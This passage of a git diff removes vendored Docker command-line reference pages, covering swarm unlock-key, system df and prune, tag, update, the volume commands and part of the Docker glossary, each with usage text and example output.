swarm unlock-key -To unlock a swarm manager after it restarts, run the `docker swarm unlock` -command and provide the following key: - - SWMKEY-1-fySn8TY4w5lKcWcJPIpKufejh9hxx5KYwx6XZigx3Q4 - -Please remember to store this key in a password manager, since without it you -will not be able to restart the manager. -``` - -Use the `--rotate` flag to rotate the unlock key to a new, randomly-generated -key: - -```bash -$ docker swarm unlock-key --rotate -Successfully rotated manager unlock key. - -To unlock a swarm manager after it restarts, run the `docker swarm unlock` -command and provide the following key: - - SWMKEY-1-7c37Cc8654o6p38HnroywCi19pllOnGtbdZEgtKxZu8 - -Please remember to store this key in a password manager, since without it you -will not be able to restart the manager. 
-``` - -The `-q` (or `--quiet`) flag only prints the key: - -```bash -$ docker swarm unlock-key -q -SWMKEY-1-7c37Cc8654o6p38HnroywCi19pllOnGtbdZEgtKxZu8 -``` - -### `--rotate` - -This flag rotates the unlock key, replacing it with a new randomly-generated -key. The old unlock key will no longer be accepted. - -### `--quiet` - -Only print the unlock key, without instructions. - -## Related information - -* [swarm unlock](swarm_unlock.md) -* [swarm init](swarm_init.md) -* [swarm update](swarm_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_update.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_update.md deleted file mode 100644 index 0af63fe3e0..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_update.md +++ /dev/null @@ -1,45 +0,0 @@ ---- -title: "swarm update" -description: "The swarm update command description and usage" -keywords: "swarm, update" ---- - - - -# swarm update - -```markdown -Usage: docker swarm update [OPTIONS] - -Update the swarm - -Options: - --autolock Change manager autolocking setting (true|false) - --cert-expiry duration Validity period for node certificates (ns|us|ms|s|m|h) (default 2160h0m0s) - --dispatcher-heartbeat duration Dispatcher heartbeat period (ns|us|ms|s|m|h) (default 5s) - --external-ca external-ca Specifications of one or more certificate signing endpoints - --help Print usage - --max-snapshots uint Number of additional Raft snapshots to retain - --snapshot-interval uint Number of log entries between Raft snapshots (default 10000) - --task-history-limit int Task history retention limit (default 5) -``` - -Updates a swarm with new parameter values. This command must target a manager node. 
- - -```bash -$ docker swarm update --cert-expiry 720h -``` - -## Related information - -* [swarm init](swarm_init.md) -* [swarm join](swarm_join.md) -* [swarm leave](swarm_leave.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/system_df.md b/vendor/github.com/docker/docker/docs/reference/commandline/system_df.md deleted file mode 100644 index c6e8bbdc68..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/system_df.md +++ /dev/null @@ -1,76 +0,0 @@ ---- -title: "system df" -description: "The system df command description and usage" -keywords: "system, data, usage, disk" ---- - - - -# system df - -```markdown -Usage: docker system df [OPTIONS] - -Show docker filesystem usage - -Options: - --help Print usage - -v, --verbose Show detailed information on space usage -``` - -The `docker system df` command displays information regarding the -amount of disk space used by the docker daemon. - -By default the command will just show a summary of the data used: -```bash -$ docker system df -TYPE TOTAL ACTIVE SIZE RECLAIMABLE -Images 5 2 16.43 MB 11.63 MB (70%) -Containers 2 0 212 B 212 B (100%) -Local Volumes 2 1 36 B 0 B (0%) -``` - -A more detailed view can be requested using the `-v, --verbose` flag: -```bash -$ docker system df -v -Images space usage: - -REPOSITORY TAG IMAGE ID CREATED SIZE SHARED SIZE UNIQUE SIZE CONTAINERS -my-curl latest b2789dd875bf 6 minutes ago 11 MB 11 MB 5 B 0 -my-jq latest ae67841be6d0 6 minutes ago 9.623 MB 8.991 MB 632.1 kB 0 - a0971c4015c1 6 minutes ago 11 MB 11 MB 0 B 0 -alpine latest 4e38e38c8ce0 9 weeks ago 4.799 MB 0 B 4.799 MB 1 -alpine 3.3 47cf20d8c26c 9 weeks ago 4.797 MB 4.797 MB 0 B 1 - -Containers space usage: - -CONTAINER ID IMAGE COMMAND LOCAL VOLUMES SIZE CREATED STATUS NAMES -4a7f7eebae0f alpine:latest "sh" 1 0 B 16 minutes ago Exited (0) 5 minutes ago hopeful_yalow -f98f9c2aa1ea alpine:3.3 "sh" 1 212 B 16 minutes ago Exited (0) 48 seconds ago anon-vol - -Local Volumes space 
usage: - -NAME LINKS SIZE -07c7bdf3e34ab76d921894c2b834f073721fccfbbcba792aa7648e3a7a664c2e 2 36 B -my-named-vol 0 0 B -``` - -* `SHARED SIZE` is the amount of space that an image shares with another one (i.e. their common data) -* `UNIQUE SIZE` is the amount of space that is only used by a given image -* `SIZE` is the virtual size of the image, it is the sum of `SHARED SIZE` and `UNIQUE SIZE` - -Note that network information is not shown because it doesn't consume the disk space. - -## Related Information -* [system prune](system_prune.md) -* [container prune](container_prune.md) -* [volume prune](volume_prune.md) -* [image prune](image_prune.md) -* [network prune](network_prune.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/system_prune.md b/vendor/github.com/docker/docker/docs/reference/commandline/system_prune.md deleted file mode 100644 index 46f8c4364a..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/system_prune.md +++ /dev/null @@ -1,79 +0,0 @@ ---- -title: "system prune" -description: "Remove unused data" -keywords: "system, prune, delete, remove" ---- - - - -# system prune - -```markdown -Usage: docker system prune [OPTIONS] - -Delete unused data - -Options: - -a, --all Remove all unused data not just dangling ones - -f, --force Do not prompt for confirmation - --help Print usage -``` - -Remove all unused containers, volumes, networks and images (both dangling and unreferenced). - -Example output: - -```bash -$ docker system prune -a -WARNING! This will remove: - - all stopped containers - - all volumes not used by at least one container - - all networks not used by at least one container - - all images without at least one container associated to them -Are you sure you want to continue? 
[y/N] y -Deleted Containers: -0998aa37185a1a7036b0e12cf1ac1b6442dcfa30a5c9650a42ed5010046f195b -73958bfb884fa81fa4cc6baf61055667e940ea2357b4036acbbe25a60f442a4d - -Deleted Volumes: -named-vol - -Deleted Images: -untagged: my-curl:latest -deleted: sha256:7d88582121f2a29031d92017754d62a0d1a215c97e8f0106c586546e7404447d -deleted: sha256:dd14a93d83593d4024152f85d7c63f76aaa4e73e228377ba1d130ef5149f4d8b -untagged: alpine:3.3 -deleted: sha256:695f3d04125db3266d4ab7bbb3c6b23aa4293923e762aa2562c54f49a28f009f -untagged: alpine:latest -deleted: sha256:ee4603260daafe1a8c2f3b78fd760922918ab2441cbb2853ed5c439e59c52f96 -deleted: sha256:9007f5987db353ec398a223bc5a135c5a9601798ba20a1abba537ea2f8ac765f -deleted: sha256:71fa90c8f04769c9721459d5aa0936db640b92c8c91c9b589b54abd412d120ab -deleted: sha256:bb1c3357b3c30ece26e6604aea7d2ec0ace4166ff34c3616701279c22444c0f3 -untagged: my-jq:latest -deleted: sha256:6e66d724542af9bc4c4abf4a909791d7260b6d0110d8e220708b09e4ee1322e1 -deleted: sha256:07b3fa89d4b17009eb3988dfc592c7d30ab3ba52d2007832dffcf6d40e3eda7f -deleted: sha256:3a88a5c81eb5c283e72db2dbc6d65cbfd8e80b6c89bb6e714cfaaa0eed99c548 - -Total reclaimed space: 13.5 MB -``` - -## Related information - -* [volume create](volume_create.md) -* [volume ls](volume_ls.md) -* [volume inspect](volume_inspect.md) -* [volume rm](volume_rm.md) -* [volume prune](volume_prune.md) -* [Understand Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/) -* [system df](system_df.md) -* [container prune](container_prune.md) -* [image prune](image_prune.md) -* [network prune](network_prune.md) -* [system prune](system_prune.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/tag.md b/vendor/github.com/docker/docker/docs/reference/commandline/tag.md deleted file mode 100644 index 983bfe27b2..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/tag.md +++ /dev/null @@ -1,74 +0,0 @@ ---- -title: "tag" -description: "The tag command description and 
usage" -keywords: "tag, name, image" ---- - - - -# tag - -```markdown -Usage: docker tag SOURCE_IMAGE[:TAG] TARGET_IMAGE[:TAG] - -Create a tag TARGET_IMAGE that refers to SOURCE_IMAGE - -Options: - --help Print usage -``` - -An image name is made up of slash-separated name components, optionally prefixed -by a registry hostname. The hostname must comply with standard DNS rules, but -may not contain underscores. If a hostname is present, it may optionally be -followed by a port number in the format `:8080`. If not present, the command -uses Docker's public registry located at `registry-1.docker.io` by default. Name -components may contain lowercase characters, digits and separators. A separator -is defined as a period, one or two underscores, or one or more dashes. A name -component may not start or end with a separator. - -A tag name may contain lowercase and uppercase characters, digits, underscores, -periods and dashes. A tag name may not start with a period or a dash and may -contain a maximum of 128 characters. - -You can group your images together using names and tags, and then upload them -to [*Share Images via Repositories*](https://docs.docker.com/engine/tutorials/dockerrepos/#/contributing-to-docker-hub). - -# Examples - -## Tagging an image referenced by ID - -To tag a local image with ID "0e5574283393" into the "fedora" repository with -"version1.0": - - docker tag 0e5574283393 fedora/httpd:version1.0 - -## Tagging an image referenced by Name - -To tag a local image with name "httpd" into the "fedora" repository with -"version1.0": - - docker tag httpd fedora/httpd:version1.0 - -Note that since the tag name is not specified, the alias is created for an -existing local version `httpd:latest`. 
- -## Tagging an image referenced by Name and Tag - -To tag a local image with name "httpd" and tag "test" into the "fedora" -repository with "version1.0.test": - - docker tag httpd:test fedora/httpd:version1.0.test - -## Tagging an image for a private repository - -To push an image to a private registry and not the central Docker -registry you must tag it with the registry hostname and port (if needed). - - docker tag 0e5574283393 myregistryhost:5000/fedora/httpd:version1.0 diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/top.md b/vendor/github.com/docker/docker/docs/reference/commandline/top.md deleted file mode 100644 index 0a04828775..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/top.md +++ /dev/null @@ -1,25 +0,0 @@ ---- -title: "top" -description: "The top command description and usage" -keywords: "container, running, processes" ---- - - - -# top - -```markdown -Usage: docker top CONTAINER [ps OPTIONS] - -Display the running processes of a container - -Options: - --help Print usage -``` diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/unpause.md b/vendor/github.com/docker/docker/docs/reference/commandline/unpause.md deleted file mode 100644 index aa2326fefc..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/unpause.md +++ /dev/null @@ -1,36 +0,0 @@ ---- -title: "unpause" -description: "The unpause command description and usage" -keywords: "cgroups, suspend, container" ---- - - - -# unpause - -```markdown -Usage: docker unpause CONTAINER [CONTAINER...] - -Unpause all processes within one or more containers - -Options: - --help Print usage -``` - -The `docker unpause` command un-suspends all processes in the specified containers. -On Linux, it does this using the cgroups freezer. - -See the -[cgroups freezer documentation](https://www.kernel.org/doc/Documentation/cgroup-v1/freezer-subsystem.txt) -for further details. 
- -## Related information - -* [pause](pause.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/update.md b/vendor/github.com/docker/docker/docs/reference/commandline/update.md deleted file mode 100644 index a13900440f..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/update.md +++ /dev/null @@ -1,120 +0,0 @@ ---- -title: "update" -description: "The update command description and usage" -keywords: "resources, update, dynamically" ---- - - - -## update - -```markdown -Usage: docker update [OPTIONS] CONTAINER [CONTAINER...] - -Update configuration of one or more containers - -Options: - --blkio-weight value Block IO (relative weight), between 10 and 1000 - --cpu-period int Limit CPU CFS (Completely Fair Scheduler) period - --cpu-quota int Limit CPU CFS (Completely Fair Scheduler) quota - -c, --cpu-shares int CPU shares (relative weight) - --cpu-rt-period int Limit the CPU real-time period in microseconds - --cpu-rt-runtime int Limit the CPU real-time runtime in microseconds - --cpuset-cpus string CPUs in which to allow execution (0-3, 0,1) - --cpuset-mems string MEMs in which to allow execution (0-3, 0,1) - --help Print usage - --kernel-memory string Kernel memory limit - -m, --memory string Memory limit - --memory-reservation string Memory soft limit - --memory-swap string Swap limit equal to memory plus swap: '-1' to enable unlimited swap - --restart string Restart policy to apply when a container exits -``` - -The `docker update` command dynamically updates container configuration. -You can use this command to prevent containers from consuming too many -resources from their Docker host. With a single command, you can place -limits on a single container or on many. To specify more than one container, -provide space-separated list of container names or IDs. - -With the exception of the `--kernel-memory` option, you can specify these -options on a running or a stopped container. 
On kernel version older than -4.6, you can only update `--kernel-memory` on a stopped container or on -a running container with kernel memory initialized. - -## Examples - -The following sections illustrate ways to use this command. - -### Update a container's cpu-shares - -To limit a container's cpu-shares to 512, first identify the container -name or ID. You can use `docker ps` to find these values. You can also -use the ID returned from the `docker run` command. Then, do the following: - -```bash -$ docker update --cpu-shares 512 abebf7571666 -``` - -### Update a container with cpu-shares and memory - -To update multiple resource configurations for multiple containers: - -```bash -$ docker update --cpu-shares 512 -m 300M abebf7571666 hopeful_morse -``` - -### Update a container's kernel memory constraints - -You can update a container's kernel memory limit using the `--kernel-memory` -option. On kernel version older than 4.6, this option can be updated on a -running container only if the container was started with `--kernel-memory`. -If the container was started *without* `--kernel-memory` you need to stop -the container before updating kernel memory. - -For example, if you started a container with this command: - -```bash -$ docker run -dit --name test --kernel-memory 50M ubuntu bash -``` - -You can update kernel memory while the container is running: - -```bash -$ docker update --kernel-memory 80M test -``` - -If you started a container *without* kernel memory initialized: - -```bash -$ docker run -dit --name test2 --memory 300M ubuntu bash -``` - -Update kernel memory of running container `test2` will fail. You need to stop -the container before updating the `--kernel-memory` setting. The next time you -start it, the container uses the new value. - -Kernel version newer than (include) 4.6 does not have this limitation, you -can use `--kernel-memory` the same way as other options. 
- -### Update a container's restart policy - -You can change a container's restart policy on a running container. The new -restart policy takes effect instantly after you run `docker update` on a -container. - -To update restart policy for one or more containers: - -```bash -$ docker update --restart=on-failure:3 abebf7571666 hopeful_morse -``` - -Note that if the container is started with "--rm" flag, you cannot update the restart -policy for it. The `AutoRemove` and `RestartPolicy` are mutually exclusive for the -container. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/version.md b/vendor/github.com/docker/docker/docs/reference/commandline/version.md deleted file mode 100644 index cb1bcee5b3..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/version.md +++ /dev/null @@ -1,67 +0,0 @@ ---- -title: "version" -description: "The version command description and usage" -keywords: "version, architecture, api" ---- - - - -# version - -```markdown -Usage: docker version [OPTIONS] - -Show the Docker version information - -Options: - -f, --format string Format the output using the given Go template - --help Print usage -``` - -By default, this will render all version information in an easy to read -layout. If a format is specified, the given template will be executed instead. - -Go's [text/template](http://golang.org/pkg/text/template/) package -describes all the details of the format. 
- -## Examples - -**Default output:** - - $ docker version - Client: - Version: 1.8.0 - API version: 1.20 - Go version: go1.4.2 - Git commit: f5bae0a - Built: Tue Jun 23 17:56:00 UTC 2015 - OS/Arch: linux/amd64 - - Server: - Version: 1.8.0 - API version: 1.20 - Go version: go1.4.2 - Git commit: f5bae0a - Built: Tue Jun 23 17:56:00 UTC 2015 - OS/Arch: linux/amd64 - -**Get server version:** - - {% raw %} - $ docker version --format '{{.Server.Version}}' - 1.8.0 - {% endraw %} - -**Dump raw data:** - - {% raw %} - $ docker version --format '{{json .}}' - {"Client":{"Version":"1.8.0","ApiVersion":"1.20","GitCommit":"f5bae0a","GoVersion":"go1.4.2","Os":"linux","Arch":"amd64","BuildTime":"Tue Jun 23 17:56:00 UTC 2015"},"ServerOK":true,"Server":{"Version":"1.8.0","ApiVersion":"1.20","GitCommit":"f5bae0a","GoVersion":"go1.4.2","Os":"linux","Arch":"amd64","KernelVersion":"3.13.2-gentoo","BuildTime":"Tue Jun 23 17:56:00 UTC 2015"}} - {% endraw %} diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/volume_create.md b/vendor/github.com/docker/docker/docs/reference/commandline/volume_create.md deleted file mode 100644 index 9b188a9500..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/volume_create.md +++ /dev/null @@ -1,91 +0,0 @@ ---- -title: "volume create" -description: "The volume create command description and usage" -keywords: "volume, create" ---- - - - -# volume create - -```markdown -Usage: docker volume create [OPTIONS] [VOLUME] - -Create a volume - -Options: - -d, --driver string Specify volume driver name (default "local") - --help Print usage - --label value Set metadata for a volume (default []) - -o, --opt value Set driver specific options (default map[]) -``` - -Creates a new volume that containers can consume and store data in. If a name is not specified, Docker generates a random name. 
You create a volume and then configure the container to use it, for example: - -```bash -$ docker volume create hello -hello - -$ docker run -d -v hello:/world busybox ls /world -``` - -The mount is created inside the container's `/world` directory. Docker does not support relative paths for mount points inside the container. - -Multiple containers can use the same volume in the same time period. This is useful if two containers need access to shared data. For example, if one container writes and the other reads the data. - -Volume names must be unique among drivers. This means you cannot use the same volume name with two different drivers. If you attempt this `docker` returns an error: - -``` -A volume named "hello" already exists with the "some-other" driver. Choose a different volume name. -``` - -If you specify a volume name already in use on the current driver, Docker assumes you want to re-use the existing volume and does not return an error. - -## Driver specific options - -Some volume drivers may take options to customize the volume creation. Use the `-o` or `--opt` flags to pass driver options: - -```bash -$ docker volume create --driver fake --opt tardis=blue --opt timey=wimey -``` - -These options are passed directly to the volume driver. Options for -different volume drivers may do different things (or nothing at all). - -The built-in `local` driver on Windows does not support any options. - -The built-in `local` driver on Linux accepts options similar to the linux `mount` command. You can provide multiple options by passing the `--opt` flag multiple times. Some `mount` options (such as the `o` option) can take a comma-separated list of options. Complete list of available mount options can be found [here](http://man7.org/linux/man-pages/man8/mount.8.html). - -For example, the following creates a `tmpfs` volume called `foo` with a size of 100 megabyte and `uid` of 1000. 
- -```bash -$ docker volume create --driver local --opt type=tmpfs --opt device=tmpfs --opt o=size=100m,uid=1000 foo -``` - -Another example that uses `btrfs`: - -```bash -$ docker volume create --driver local --opt type=btrfs --opt device=/dev/sda2 foo -``` - -Another example that uses `nfs` to mount the `/path/to/dir` in `rw` mode from `192.168.1.1`: - -```bash -$ docker volume create --driver local --opt type=nfs --opt o=addr=192.168.1.1,rw --opt device=:/path/to/dir foo -``` - - -## Related information - -* [volume inspect](volume_inspect.md) -* [volume ls](volume_ls.md) -* [volume rm](volume_rm.md) -* [volume prune](volume_prune.md) -* [Understand Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/volume_inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/volume_inspect.md deleted file mode 100644 index 98e0ee5abf..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/volume_inspect.md +++ /dev/null @@ -1,59 +0,0 @@ ---- -title: "volume inspect" -description: "The volume inspect command description and usage" -keywords: "volume, inspect" ---- - - - -# volume inspect - -```markdown -Usage: docker volume inspect [OPTIONS] VOLUME [VOLUME...] - -Display detailed information on one or more volumes - -Options: - -f, --format string Format the output using the given Go template - --help Print usage -``` - -Returns information about a volume. By default, this command renders all results -in a JSON array. You can specify an alternate format to execute a -given template for each result. Go's -[text/template](http://golang.org/pkg/text/template/) package describes all the -details of the format. 
- -Example output: - - $ docker volume create - 85bffb0677236974f93955d8ecc4df55ef5070117b0e53333cc1b443777be24d - $ docker volume inspect 85bffb0677236974f93955d8ecc4df55ef5070117b0e53333cc1b443777be24d - [ - { - "Name": "85bffb0677236974f93955d8ecc4df55ef5070117b0e53333cc1b443777be24d", - "Driver": "local", - "Mountpoint": "/var/lib/docker/volumes/85bffb0677236974f93955d8ecc4df55ef5070117b0e53333cc1b443777be24d/_data", - "Status": null - } - ] - - {% raw %} - $ docker volume inspect --format '{{ .Mountpoint }}' 85bffb0677236974f93955d8ecc4df55ef5070117b0e53333cc1b443777be24d - /var/lib/docker/volumes/85bffb0677236974f93955d8ecc4df55ef5070117b0e53333cc1b443777be24d/_data - {% endraw %} - -## Related information - -* [volume create](volume_create.md) -* [volume ls](volume_ls.md) -* [volume rm](volume_rm.md) -* [volume prune](volume_prune.md) -* [Understand Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/volume_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/volume_ls.md deleted file mode 100644 index 90ecef2abe..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/volume_ls.md +++ /dev/null @@ -1,183 +0,0 @@ ---- -title: "volume ls" -description: "The volume ls command description and usage" -keywords: "volume, list" ---- - - - -# volume ls - -```markdown -Usage: docker volume ls [OPTIONS] - -List volumes - -Aliases: - ls, list - -Options: - -f, --filter value Provide filter values (e.g. 'dangling=true') (default []) - - dangling= a volume if referenced or not - - driver= a volume's driver name - - label= or label== - - name= a volume's name - --format string Pretty-print volumes using a Go template - --help Print usage - -q, --quiet Only display volume names -``` - -List all the volumes Docker knows about. You can filter using the `-f` or `--filter` flag. 
Refer to the [filtering](#filtering) section for more information about available filter options. - -Example output: - -```bash -$ docker volume create rosemary -rosemary -$docker volume create tyler -tyler -$ docker volume ls -DRIVER VOLUME NAME -local rosemary -local tyler -``` - -## Filtering - -The filtering flag (`-f` or `--filter`) format is of "key=value". If there is more -than one filter, then pass multiple flags (e.g., `--filter "foo=bar" --filter "bif=baz"`) - -The currently supported filters are: - -* dangling (boolean - true or false, 0 or 1) -* driver (a volume driver's name) -* label (`label=` or `label==`) -* name (a volume's name) - -### dangling - -The `dangling` filter matches on all volumes not referenced by any containers - -```bash -$ docker run -d -v tyler:/tmpwork busybox - -f86a7dd02898067079c99ceacd810149060a70528eff3754d0b0f1a93bd0af18 -$ docker volume ls -f dangling=true -DRIVER VOLUME NAME -local rosemary -``` - -### driver - -The `driver` filter matches on all or part of a volume's driver name. - -The following filter matches all volumes with a driver name containing the `local` string. - -```bash -$ docker volume ls -f driver=local - -DRIVER VOLUME NAME -local rosemary -local tyler -``` - -#### Label - -The `label` filter matches volumes based on the presence of a `label` alone or -a `label` and a value. - -First, let's create some volumes to illustrate this; - -```bash -$ docker volume create the-doctor --label is-timelord=yes -the-doctor -$ docker volume create daleks --label is-timelord=no -daleks -``` - -The following example filter matches volumes with the `is-timelord` label -regardless of its value. - -```bash -$ docker volume ls --filter label=is-timelord - -DRIVER VOLUME NAME -local daleks -local the-doctor -``` - -As can be seen in the above example, both volumes with `is-timelord=yes`, and -`is-timelord=no` are returned. 
- -Filtering on both `key` *and* `value` of the label, produces the expected result: - -```bash -$ docker volume ls --filter label=is-timelord=yes - -DRIVER VOLUME NAME -local the-doctor -``` - -Specifying multiple label filter produces an "and" search; all conditions -should be met; - -```bash -$ docker volume ls --filter label=is-timelord=yes --filter label=is-timelord=no - -DRIVER VOLUME NAME -``` - -### name - -The `name` filter matches on all or part of a volume's name. - -The following filter matches all volumes with a name containing the `rose` string. - - $ docker volume ls -f name=rose - DRIVER VOLUME NAME - local rosemary - -## Formatting - -The formatting options (`--format`) pretty-prints volumes output -using a Go template. - -Valid placeholders for the Go template are listed below: - -Placeholder | Description ---------------|------------------------------------------------------------------------------------------ -`.Name` | Network name -`.Driver` | Network driver -`.Scope` | Network scope (local, global) -`.Mountpoint` | Whether the network is internal or not. -`.Labels` | All labels assigned to the volume. -`.Label` | Value of a specific label for this volume. For example `{{.Label "project.version"}}` - -When using the `--format` option, the `volume ls` command will either -output the data exactly as the template declares or, when using the -`table` directive, includes column headers as well. 
- -The following example uses a template without headers and outputs the -`Name` and `Driver` entries separated by a colon for all volumes: - -```bash -$ docker volume ls --format "{{.Name}}: {{.Driver}}" -vol1: local -vol2: local -vol3: local -``` - -## Related information - -* [volume create](volume_create.md) -* [volume inspect](volume_inspect.md) -* [volume rm](volume_rm.md) -* [volume prune](volume_prune.md) -* [Understand Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/volume_prune.md b/vendor/github.com/docker/docker/docs/reference/commandline/volume_prune.md deleted file mode 100644 index d910a49cdc..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/volume_prune.md +++ /dev/null @@ -1,54 +0,0 @@ ---- -title: "volume prune" -description: "Remove unused volumes" -keywords: "volume, prune, delete" ---- - - - -# volume prune - -```markdown -Usage: docker volume prune [OPTIONS] - -Remove all unused volumes - -Options: - -f, --force Do not prompt for confirmation - --help Print usage -``` - -Remove all unused volumes. Unused volumes are those which are not referenced by any containers - -Example output: - -```bash -$ docker volume prune -WARNING! This will remove all volumes not used by at least one container. -Are you sure you want to continue? 
[y/N] y -Deleted Volumes: -07c7bdf3e34ab76d921894c2b834f073721fccfbbcba792aa7648e3a7a664c2e -my-named-vol - -Total reclaimed space: 36 B -``` - -## Related information - -* [volume create](volume_create.md) -* [volume ls](volume_ls.md) -* [volume inspect](volume_inspect.md) -* [volume rm](volume_rm.md) -* [Understand Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/) -* [system df](system_df.md) -* [container prune](container_prune.md) -* [image prune](image_prune.md) -* [network prune](network_prune.md) -* [system prune](system_prune.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/volume_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/volume_rm.md deleted file mode 100644 index 1bf9dba220..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/volume_rm.md +++ /dev/null @@ -1,42 +0,0 @@ ---- -title: "volume rm" -description: "the volume rm command description and usage" -keywords: "volume, rm" ---- - - - -# volume rm - -```markdown -Usage: docker volume rm [OPTIONS] VOLUME [VOLUME...] - -Remove one or more volumes - -Aliases: - rm, remove - -Options: - -f, --force Force the removal of one or more volumes - --help Print usage -``` - -Remove one or more volumes. You cannot remove a volume that is in use by a container. 
- - $ docker volume rm hello - hello - -## Related information - -* [volume create](volume_create.md) -* [volume inspect](volume_inspect.md) -* [volume ls](volume_ls.md) -* [volume prune](volume_prune.md) -* [Understand Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/wait.md b/vendor/github.com/docker/docker/docs/reference/commandline/wait.md deleted file mode 100644 index a07b82b071..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/wait.md +++ /dev/null @@ -1,25 +0,0 @@ ---- -title: "wait" -description: "The wait command description and usage" -keywords: "container, stop, wait" ---- - - - -# wait - -```markdown -Usage: docker wait CONTAINER [CONTAINER...] - -Block until one or more containers stop, then print their exit codes - -Options: - --help Print usage -``` diff --git a/vendor/github.com/docker/docker/docs/reference/glossary.md b/vendor/github.com/docker/docker/docs/reference/glossary.md deleted file mode 100644 index 0bc39a2023..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/glossary.md +++ /dev/null @@ -1,286 +0,0 @@ ---- -title: "Docker Glossary" -description: "Glossary of terms used around Docker" -keywords: "glossary, docker, terms, definitions" ---- - - - -# Glossary - -A list of terms used around the Docker project. - -## aufs - -aufs (advanced multi layered unification filesystem) is a Linux [filesystem](#filesystem) that -Docker supports as a storage backend. It implements the -[union mount](http://en.wikipedia.org/wiki/Union_mount) for Linux file systems. - -## base image - -An image that has no parent is a **base image**. - -## boot2docker - -[boot2docker](http://boot2docker.io/) is a lightweight Linux distribution made -specifically to run Docker containers. 
The boot2docker management tool for Mac and Windows was deprecated and replaced by [`docker-machine`](#machine) which you can install with the Docker Toolbox. - -## btrfs - -btrfs (B-tree file system) is a Linux [filesystem](#filesystem) that Docker -supports as a storage backend. It is a [copy-on-write](http://en.wikipedia.org/wiki/Copy-on-write) -filesystem. - -## build - -build is the process of building Docker images using a [Dockerfile](#dockerfile). -The build uses a Dockerfile and a "context". The context is the set of files in the -directory in which the image is built. - -## cgroups - -cgroups is a Linux kernel feature that limits, accounts for, and isolates -the resource usage (CPU, memory, disk I/O, network, etc.) of a collection -of processes. Docker relies on cgroups to control and isolate resource limits. - -*Also known as : control groups* - -## Compose - -[Compose](https://github.com/docker/compose) is a tool for defining and -running complex applications with Docker. With compose, you define a -multi-container application in a single file, then spin your -application up in a single command which does everything that needs to -be done to get it running. - -*Also known as : docker-compose, fig* - -## container - -A container is a runtime instance of a [docker image](#image). - -A Docker container consists of - -- A Docker image -- Execution environment -- A standard set of instructions - -The concept is borrowed from Shipping Containers, which define a standard to ship -goods globally. Docker defines a standard to ship software. - -## data volume - -A data volume is a specially-designated directory within one or more containers -that bypasses the Union File System. Data volumes are designed to persist data, -independent of the container's life cycle. Docker therefore never automatically -delete volumes when you remove a container, nor will it "garbage collect" -volumes that are no longer referenced by a container. 
- - -## Docker - -The term Docker can refer to - -- The Docker project as a whole, which is a platform for developers and sysadmins to -develop, ship, and run applications -- The docker daemon process running on the host which manages images and containers - - -## Docker Hub - -The [Docker Hub](https://hub.docker.com/) is a centralized resource for working with -Docker and its components. It provides the following services: - -- Docker image hosting -- User authentication -- Automated image builds and work-flow tools such as build triggers and web hooks -- Integration with GitHub and Bitbucket - - -## Dockerfile - -A Dockerfile is a text document that contains all the commands you would -normally execute manually in order to build a Docker image. Docker can -build images automatically by reading the instructions from a Dockerfile. - -## filesystem - -A file system is the method an operating system uses to name files -and assign them locations for efficient storage and retrieval. - -Examples : - -- Linux : ext4, aufs, btrfs, zfs -- Windows : NTFS -- macOS : HFS+ - -## image - -Docker images are the basis of [containers](#container). An Image is an -ordered collection of root filesystem changes and the corresponding -execution parameters for use within a container runtime. An image typically -contains a union of layered filesystems stacked on top of each other. An image -does not have state and it never changes. - -## libcontainer - -libcontainer provides a native Go implementation for creating containers with -namespaces, cgroups, capabilities, and filesystem access controls. It allows -you to manage the lifecycle of the container performing additional operations -after the container is created. - -## libnetwork - -libnetwork provides a native Go implementation for creating and managing container -network namespaces and other network resources. It manage the networking lifecycle -of the container performing additional operations after the container is created. 
